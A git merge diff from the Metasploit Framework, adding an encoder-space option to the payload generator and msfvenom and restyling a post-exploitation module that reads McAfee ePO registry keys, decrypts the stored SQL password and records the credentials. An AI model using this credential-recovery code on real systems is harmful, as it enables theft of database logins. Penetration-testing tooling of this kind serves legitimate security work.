Merge branch 'master' of git://github.com/rapid7/metasploit-framework

Author: shuckins-r7

lib/msf/core/payload_generator.rb

@@ -64,6 +64,9 @@ class PayloadGenerator
     # @!attribute  space
     #   @return [Fixnum] The maximum size in bytes of the payload
     attr_accessor :space
+    # @!attribute  encoder_space
+    #   @return [Fixnum] The maximum size in bytes of the encoded payload
+    attr_accessor :encoder_space
     # @!attribute  stdin
     #   @return [String] The raw bytes of a payload taken from STDIN
     attr_accessor :stdin
@@ -85,6 +88,7 @@ class PayloadGenerator
     # @option opts [String] :badchars (see #badchars)
     # @option opts [String] :template (see #template)
     # @option opts [Fixnum] :space (see #space)
+    # @option opts [Fixnum] :encoder_space (see #encoder_space)
     # @option opts [Fixnum] :nops (see #nops)
     # @option opts [String] :add_code (see #add_code)
     # @option opts [Boolean] :keep (see #keep)
@@ -109,6 +113,7 @@ def initialize(opts={})
       @stdin      = opts.fetch(:stdin, nil)
       @template   = opts.fetch(:template, '')
       @var_name   = opts.fetch(:var_name, 'buf')
+      @encoder_space = opts.fetch(:encoder_space, @space)
 
       @framework  = opts.fetch(:framework)
 
@@ -200,7 +205,7 @@ def encode_payload(shellcode)
         encoder_list.each do |encoder_mod|
           cli_print "Attempting to encode payload with #{iterations} iterations of #{encoder_mod.refname}"
           begin
-            encoder_mod.available_space = @space
+            encoder_mod.available_space = @encoder_space
             return run_encoder(encoder_mod, shellcode.dup)
           rescue ::Msf::EncoderSpaceViolation => e
             cli_print "#{encoder_mod.refname} failed with #{e.message}"
@@ -395,7 +400,7 @@ def run_encoder(encoder_module, shellcode)
       iterations.times do |x|
         shellcode = encoder_module.encode(shellcode.dup, badchars, nil, platform_list)
         cli_print "#{encoder_module.refname} succeeded with size #{shellcode.length} (iteration=#{x})"
-        if shellcode.length > space
+        if shellcode.length > encoder_space
           raise EncoderSpaceViolation, "encoder has made a buffer that is too big"
         end
       end

lib/rex/payloads/meterpreter/config.rb

@@ -39,7 +39,7 @@ def to_str(item, size)
   end
 
   def to_wchar_t(item, size)
-    to_ascii(item, size).unpack("C*").pack("v*")
+    to_ascii(item, size).unpack('C*').pack('v*')
   end
 
   def to_ascii(item, size)
@@ -57,7 +57,7 @@ def session_block(opts)
       uuid                # the UUID
     ]
 
-    session_data.pack("VVVA*")
+    session_data.pack('VVVA*')
   end
 
   def transport_block(opts)
@@ -117,7 +117,7 @@ def extension_block(ext_name, file_extension)
     ext, o = load_rdi_dll(MetasploitPayloads.meterpreter_path("ext_server_#{ext_name}",
                                                               file_extension))
 
-    extension_data = [ ext.length, ext ].pack("VA*")
+    extension_data = [ ext.length, ext ].pack('VA*')
   end
 
   def config_block
@@ -143,9 +143,9 @@ def config_block
 
     # terminate the extensions with a 0 size
     if is_x86?
-      config << [0].pack("V")
+      config << [0].pack('V')
     else
-      config << [0].pack("Q")
+      config << [0].pack('Q<')
     end
 
     # and we're done

modules/post/windows/gather/credentials/epo_sql.rb

@@ -5,7 +5,7 @@
 
 require 'msf/core'
 require 'rex'
-require "net/dns/resolver"
+require 'net/dns/resolver'
 require 'msf/core/auxiliary/report'
 
 class Metasploit3 < Msf::Post
@@ -30,20 +30,20 @@ def initialize(info={})
 
   def run
     # Find out where things are installed
-    print_status("Finding Tomcat install path...")
-    subkeys = registry_enumkeys("HKLM\\Software\\Network Associates\\ePolicy Orchestrator")
+    print_status('Finding Tomcat install path...')
+    subkeys = registry_enumkeys('HKLM\Software\Network Associates\ePolicy Orchestrator',REGISTRY_VIEW_32_BIT)
     if subkeys.nil? or subkeys.empty?
-      print_error ("ePO 4.6 Not Installed or No Permissions to RegKey")
+      print_error ('ePO 4.6 Not Installed or No Permissions to RegKey')
       return
     end
     # Get the db.properties file location
-    epol_reg_key = "HKLM\\Software\\Network Associates\\ePolicy Orchestrator"
-    dbprops_file = registry_getvaldata(epol_reg_key, "TomcatFolder")
-    if dbprops_file == nil or dbprops_file == ""
-      print_error("Could not find db.properties file location")
+    epol_reg_key = 'HKLM\Software\Network Associates\ePolicy Orchestrator'
+    dbprops_file = registry_getvaldata(epol_reg_key, 'TomcatFolder',REGISTRY_VIEW_32_BIT)
+    if dbprops_file == nil or dbprops_file == ''
+      print_error('Could not find db.properties file location')
     else
-      dbprops_file << "/conf/orion/db.properties";
-      print_good("Found db.properties location");
+      dbprops_file << '/conf/orion/db.properties';
+      print_good('Found db.properties location');
       process_config(dbprops_file);
     end
   end
@@ -57,39 +57,39 @@ def process_config(filename)
       line.chomp
       line_array = line.split('=')
       case line_array[0]
-      when "db.database.name"
-        database_name = ""
+      when 'db.database.name'
+        database_name = ''
         line_array[1].each_byte { |x|  database_name << x unless x > 126 || x < 32 }
-      when "db.instance.name"
-        database_instance = ""
+      when 'db.instance.name'
+        database_instance = ''
         line_array[1].each_byte { |x|  database_instance << x unless x > 126 || x < 32 }
-      when "db.user.domain"
-        user_domain = ""
+      when 'db.user.domain'
+        user_domain = ''
         line_array[1].each_byte { |x|  user_domain << x unless x > 126 || x < 32 }
-      when "db.user.name"
-        user_name = ""
+      when 'db.user.name'
+        user_name = ''
         line_array[1].each_byte { |x|  user_name << x unless x > 126 || x < 32 }
-      when "db.port"
-        port = ""
+      when 'db.port'
+        port = ''
         line_array[1].each_byte { |x|  port << x unless x > 126 || x < 32 }
-      when "db.user.passwd.encrypted.ex"
+      when 'db.user.passwd.encrypted.ex'
         # ePO 4.6 encrypted password
-        passwd = ""
+        passwd = ''
         line_array[1].each_byte { |x|  passwd << x unless x > 126 || x < 32 }
-        passwd.gsub("\\","")
+        passwd.gsub('\\','')
         # Add any Base64 padding that may have been stripped out
-        passwd << "=" until ( passwd.length % 4 == 0 )
+        passwd << '=' until ( passwd.length % 4 == 0 )
         plaintext_passwd = decrypt46(passwd)
-      when "db.user.passwd.encrypted"
+      when 'db.user.passwd.encrypted'
         # ePO 4.5 encrypted password - not currently supported, see notes below
-        passwd = ""
+        passwd = ''
         line_array[1].each_byte { |x|  passwd << x unless x > 126 || x < 32 }
-        passwd.gsub("\\","")
+        passwd.gsub('\\','')
         # Add any Base64 padding that may have been stripped out
-        passwd << "=" until ( passwd.length % 4 == 0 )
-        plaintext_passwd = "PASSWORD NOT RECOVERED - ePO 4.5 DECRYPT SUPPORT IS WIP"
-      when "db.server.name"
-        database_server_name = ""
+        passwd << '=' until ( passwd.length % 4 == 0 )
+        plaintext_passwd = 'PASSWORD NOT RECOVERED - ePO 4.5 DECRYPT SUPPORT IS WIP'
+      when 'db.server.name'
+        database_server_name = ''
         line_array[1].each_byte { |x|  database_server_name << x unless x > 126 || x < 32 }
       end
     end
@@ -98,7 +98,7 @@ def process_config(filename)
 
     result = client.net.resolve.resolve_host(database_server_name)
     if result[:ip].nil? or  result[:ip].empty?
-      print_error("Could not determine IP of DB - credentials not added to report database")
+      print_error('Could not determine IP of DB - credentials not added to report database')
       return
     end
 
@@ -111,11 +111,11 @@ def process_config(filename)
       print_good("Database IP: #{db_ip}")
     end
     print_good("Port: #{port}")
-    if user_domain == nil or user_domain == ""
-      print_good("Authentication Type: SQL");
+    if user_domain == nil or user_domain == ''
+      print_good('Authentication Type: SQL');
       full_user = user_name
     else
-      print_good("Authentication Type: Domain");
+      print_good('Authentication Type: Domain');
       print_good("Domain: #{user_domain}");
       full_user = "#{user_domain}\\#{user_name}"
     end
@@ -127,8 +127,8 @@ def process_config(filename)
       service_data = {
         address: Rex::Socket.getaddress(db_ip),
         port: port,
-        protocol: "tcp",
-        service_name: "mssql",
+        protocol: 'tcp',
+        service_name: 'mssql',
         workspace_id: myworkspace_id
       }
 
@@ -145,21 +145,21 @@ def process_config(filename)
 
       login_data = {
         core: credential_core,
-        access_level: "User",
+        access_level: 'User',
         status: Metasploit::Model::Login::Status::UNTRIED
       }
 
       create_credential_login(login_data.merge(service_data))
-      print_good("Added credentials to report database")
+      print_good('Added credentials to report database')
     else
-      print_error("Could not determine IP of DB - credentials not added to report database")
+      print_error('Could not determine IP of DB - credentials not added to report database')
     end
   end
 
 
   def decrypt46(encoded)
     encrypted_data = Rex::Text.decode_base64(encoded)
-    aes = OpenSSL::Cipher::Cipher.new("AES-128-ECB")
+    aes = OpenSSL::Cipher::Cipher.new('AES-128-ECB')
     aes.padding = 0
     aes.decrypt
     # Private key extracted from ePO 4.6.0 Build 1029
@@ -172,6 +172,5 @@ def decrypt46(encoded)
     password.gsub!(/[^[:print:]]/,'')
     return password
   end
-
-
 end
+

msfvenom

@@ -58,90 +58,95 @@ require 'msf/core/payload_generator'
     opt.separator('')
     opt.separator('Options:')
 
-    opt.on('-p', '--payload    <payload>', String, 'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p|
+    opt.on('-p', '--payload       <payload>', String,
+      'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p|
       if p == '-'
         opts[:payload] = 'stdin'
       else
         opts[:payload] = p
       end
     end
 
-    opt.on('-l', '--list       [module_type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l|
+    opt.on('--payload-options', "List the payload's standard options") do
+      opts[:list_options] = true
+    end
+
+    opt.on('-l', '--list          [type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l|
       if l.nil? or l.empty?
         l = ["all"]
       end
       opts[:list] = l
     end
 
-    opt.on('-n', '--nopsled    <length>', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n|
+    opt.on('-n', '--nopsled       <length>', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n|
       opts[:nops] = n.to_i
     end
 
-    opt.on('-f', '--format     <format>', String, "Output format (use --help-formats for a list)") do |f|
+    opt.on('-f', '--format        <format>', String, "Output format (use --help-formats for a list)") do |f|
       opts[:format] = f
     end
 
-    opt.on('-e', '--encoder    [encoder]', String, 'The encoder to use') do |e|
+    opt.on('--help-formats', String, "List available formats") do
+      init_framework(:module_types => [])
+      msg = "Executable formats\n" +
+            "\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" +
+            "Transform formats\n" +
+            "\t" + ::Msf::Simple::Buffer.transform_formats.join(", ")
+      raise UsageError, msg
+    end
+
+    opt.on('-e', '--encoder       <encoder>', String, 'The encoder to use') do |e|
       opts[:encoder] = e
     end
 
-    opt.on('-a', '--arch       <architecture>', String, 'The architecture to use') do |a|
+    opt.on('-a', '--arch          <arch>', String, 'The architecture to use') do |a|
       opts[:arch] = a
     end
 
-    opt.on('--platform   <platform>', String, 'The platform of the payload') do |l|
+    opt.on('--platform      <platform>', String, 'The platform of the payload') do |l|
       opts[:platform] = l
     end
 
-    opt.on('-s', '--space      <length>', Integer, 'The maximum size of the resulting payload') do |s|
+    opt.on('-s', '--space         <length>', Integer, 'The maximum size of the resulting payload') do |s|
       opts[:space] = s
     end
 
-    opt.on('-b', '--bad-chars  <list>', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b|
+    opt.on('--encoder-space <length>', Integer, 'The maximum size of the encoded payload (defaults to the -s value)') do |s|
+      opts[:encoder_space] = s
+    end
+
+    opt.on('-b', '--bad-chars     <list>', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b|
       opts[:badchars] = Rex::Text.hex_to_raw(b)
     end
 
-    opt.on('-i', '--iterations <count>', Integer, 'The number of times to encode the payload') do |i|
+    opt.on('-i', '--iterations    <count>', Integer, 'The number of times to encode the payload') do |i|
       opts[:iterations] = i
     end
 
-    opt.on('-c', '--add-code   <path>', String, 'Specify an additional win32 shellcode file to include') do |x|
+    opt.on('-c', '--add-code      <path>', String, 'Specify an additional win32 shellcode file to include') do |x|
       opts[:add_code] = x
     end
 
-    opt.on('-x', '--template   <path>', String, 'Specify a custom executable file to use as a template') do |x|
+    opt.on('-x', '--template      <path>', String, 'Specify a custom executable file to use as a template') do |x|
       opts[:template] = x
     end
 
     opt.on('-k', '--keep', 'Preserve the template behavior and inject the payload as a new thread') do
       opts[:keep] = true
     end
 
-    opt.on('--payload-options', "List the payload's standard options") do
-      opts[:list_options] = true
-    end
-
-    opt.on('-o', '--out   <path>', 'Save the payload') do |x|
+    opt.on('-o', '--out           <path>', 'Save the payload') do |x|
       opts[:out] = x
     end
 
-    opt.on('-v', '--var-name <name>', String, 'Specify a custom variable name to use for certain output formats') do |x|
+    opt.on('-v', '--var-name      <name>', String, 'Specify a custom variable name to use for certain output formats') do |x|
       opts[:var_name] = x
     end
 
     opt.on_tail('-h', '--help', 'Show this message') do
       raise UsageError, "#{opt}"
     end
 
-    opt.on_tail('--help-formats', String, "List available formats") do
-      init_framework(:module_types => [])
-      msg = "Executable formats\n" +
-            "\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" +
-            "Transform formats\n" +
-            "\t" + ::Msf::Simple::Buffer.transform_formats.join(", ")
-      raise UsageError, msg
-    end
-
     begin
       opt.parse!(args)
     rescue OptionParser::InvalidOption => e